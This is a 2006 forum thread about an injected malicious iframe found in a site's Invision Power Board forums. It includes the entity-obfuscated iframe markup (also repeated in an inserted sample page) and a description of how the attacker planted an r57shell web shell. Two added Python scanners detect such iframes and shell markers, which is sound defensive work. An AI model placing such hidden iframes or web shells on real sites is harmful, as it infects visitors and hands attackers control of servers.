Obraxis, Posted July 8, 2006: Firefox is keeping me safe :)

RaisinCain (Author), Posted July 8, 2006: He probably was just being a smartass, like I was in my post :D :D :D

Redmak (Administrators), Posted July 8, 2006: And is it just the forums or also the main page?

WastedJoker, Posted July 8, 2006: Soon as I opened Neowin in IE7 beta3.

RaisinCain (Author), Posted July 8, 2006: Just forums for me.

iascoot, Posted July 8, 2006: It's every page (of the forums), Redmak:
</head>
<body>
CODE IS HERE
<div id="ipbwrapper">
<script type="text/javascript">
It's right near the top.

jamend, Posted July 8, 2006: "And is it just the forums or also the main page?" It's only the forums, not the main page. Anyways, the site should be taken offline until it's fixed, otherwise lots of people will be hacked. Also, and obviously, web pages don't just change themselves...

callumy, Posted July 8, 2006: Lucky I am on my Mac! God, this could be dangerous (I don't even have anti-virus for my non-internet-connected laptop; I don't connect it to the internet, so in most cases it doesn't matter). There isn't anything at http://zchxsikpgz.biz/. It is just the default Apache filler page! This is really bad. I hope it can be squashed soon. Cal

accesser, Posted July 8, 2006: This is what I am getting with Vista and IE7.

Si (Veteran), Posted July 8, 2006: Threads merged.

da13ro, Posted July 8, 2006: Confirmed: just forums.
Japlabot, Posted July 8, 2006:
<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#122;&#99;&#104;&#120;&#115;&#105;&#107;&#112;&#103;&#122;&#46;&#98;&#105;&#122;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#51;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>
When the HTML entities (the &#nnn; sequences) are decoded, it is http://zchxsikpgz.biz/dl/adv543.php. Didn't affect Firefox, had to fire up IE7 Beta 3 to see it, and NOD32 stopped it. Can anyone post a selection of the source, because I don't see it?
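The decoding Japlabot describes, turned into a check an admin could run over a saved copy of a page: it decodes entity-encoded iframe sources and flags frames that are obfuscated, near-invisible, or point off-site. This is an added example, not code from the thread; the sample page is constructed from the markup quoted in the post, and the set of trusted hosts is an assumed input.

```python
import html
import re
from urllib.parse import urlparse

# Constructed sample page, modelled on the markup quoted in the post above:
# a 1x1 iframe whose src is hidden behind decimal HTML entities, next to a
# normal-sized frame from the site's own host.
SAMPLE_HTML = """<html><head></head><body>
<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#122;&#99;&#104;&#120;&#115;&#105;&#107;&#112;&#103;&#122;&#46;&#98;&#105;&#122;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#51;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>
<div id="ipbwrapper">
<iframe src="https://www.neowin.net/embed" width="400" height="300"></iframe>
</div></body></html>"""

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
ENTITY_RE = re.compile(r"&#(?:\d+|[xX][0-9a-fA-F]+);")


def parse_attrs(raw):
    """Attribute text of one tag -> dict keyed by lowercase attribute name."""
    attrs = {}
    for m in ATTR_RE.finditer(raw):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def _dim(attrs, name):
    """Numeric width/height, or -1 when the attribute is absent or not a number."""
    try:
        return int(attrs.get(name, "-1"))
    except ValueError:
        return -1


def find_suspicious_iframes(page, trusted_hosts):
    """Return [{'src': decoded_url, 'reasons': [...]}] for iframes worth a look."""
    findings = []
    for m in IFRAME_RE.finditer(page):
        attrs = parse_attrs(m.group(1))
        raw_src = attrs.get("src", "")
        src = html.unescape(raw_src)          # &#104;&#116;... -> "ht..."
        host = urlparse(src).hostname or ""
        reasons = []
        if ENTITY_RE.search(raw_src):
            reasons.append("entity-obfuscated src")
        if 0 <= _dim(attrs, "width") <= 1 or 0 <= _dim(attrs, "height") <= 1:
            reasons.append("near-invisible frame")
        if host and host not in trusted_hosts:
            reasons.append("untrusted host " + host)
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings
```

Run it over the page source saved from the browser rather than over a live fetch, so the check does not itself request the off-site URL.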
zipgenius, Posted July 8, 2006: I can confirm: Invision Power Board has been hacked. That happened also to my forum at http://forum.wininizio.it. Useful notice for the admins: grep your server for the string "r57shell". The hacker that attacked our website used this perl script: http://www.milw0rm.com/exploits/1720. The script attacks IPB up to v2.1.5, but it could be improved to attack 2.1.6 also. The perl script can be locally executed (you just need a Perl environment in your system): it adds a post with a user account specifically added to begin the attack; the script then adds a new post with strange characters and finally it enables a remote shell. The hacker that attacked us placed a WGET command to upload a web shell (r57shell.php) that gives full control over the server, so he was able to modify the index.php file of any web application he found on our server.
iascoot, Posted July 8, 2006: It's gone :D Look at the source.

accesser, Posted July 8, 2006: So what is this nasty trying to do anyway?

da13ro, Posted July 8, 2006: Excellent, next step :p Prevention, hehe. Nicely resolved.

John (Veteran), Posted July 8, 2006: It's gone, but the exploit is still live. Invision needs to release a fix, or a workaround implemented, before we can be sure it won't happen again.

zipgenius, Posted July 8, 2006: "So what is this nasty trying to do anyway?" That code tries to load a remote malformed .WMF file in order to hit unpatched Windows systems.

84Mark, Posted July 8, 2006: Yup, fixed :D

illicit, Posted July 8, 2006: "Me too, NOD is going nuts." Same over here.

blackice912 (Veteran), Posted July 8, 2006: "It's gone :D Look at the source." Gone, yes, but now to figure out how it got in there and tie any holes down.
zipgenius, Posted July 8, 2006: (quoting the earlier post above) Additional info: this kind of attack uses the Invision folders that need to be chmod 0777, like /uploads or similar.
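A sweep that follows zipgenius's two hints together: grep the web root for the "r57shell" marker, and report script files sitting in directories that are chmod 0777 (world-writable), such as the uploads folder. This is an added example, not a tool from the thread or from Invision; it builds its own throwaway web root so it runs offline, and the marker list and script extensions are assumptions a real deployment would extend.

```python
import os
import shutil
import stat
import tempfile

SHELL_MARKERS = (b"r57shell",)          # the string the post says to grep for
SCRIPT_EXT = {".php", ".php3", ".phtml"}  # what a web server would execute

def world_writable(path):
    """True when the 'other' write bit is set (a chmod 0777-style directory)."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)

def scan_webroot(root):
    """Walk a web root; return sorted (path, reason) pairs worth an admin's attention."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        writable = world_writable(dirpath)
        for name in filenames:
            full = os.path.join(dirpath, name)
            if writable and os.path.splitext(name)[1].lower() in SCRIPT_EXT:
                findings.append((full, "script in world-writable dir"))
            try:
                with open(full, "rb") as fh:
                    head = fh.read(1 << 20)   # first MiB is enough to spot a marker
            except OSError:
                continue
            for marker in SHELL_MARKERS:
                if marker in head:
                    findings.append((full, "contains " + marker.decode()))
    return sorted(findings)

def build_sample_tree():
    """Constructed web root: an 0777 uploads dir holding an image and a planted script."""
    root = tempfile.mkdtemp(prefix="ipb-scan-")
    uploads = os.path.join(root, "uploads")
    os.makedirs(uploads)
    os.chmod(uploads, 0o777)
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(b"<?php echo 'forum index'; ?>\n")
    with open(os.path.join(uploads, "avatar.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff image bytes, not a script\n")
    with open(os.path.join(uploads, "r57shell.php"), "wb") as fh:
        fh.write(b"<?php // r57shell: constructed marker file, no shell code ?>\n")
    return root

def sample_findings():
    """Scan the constructed tree, remove it, and return findings relative to its root."""
    root = build_sample_tree()
    try:
        return [(os.path.relpath(p, root), r) for p, r in scan_webroot(root)]
    finally:
        shutil.rmtree(root)
```

On a real server the same two checks belong in a scheduled job, and any hit inside an upload directory should be compared against a known-good file list before anything is deleted.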
84Mark, Posted July 8, 2006: I wonder if it actually "got" anyone.

accesser, Posted July 8, 2006: "That code tries to load a remote malformed .WMF file in order to hit unpatched Windows systems." Thanks (Y)

zipgenius, Posted July 8, 2006: "I wonder if it actually "got" anyone." I think that someone has been affected: not everybody has applied the WMF patch :(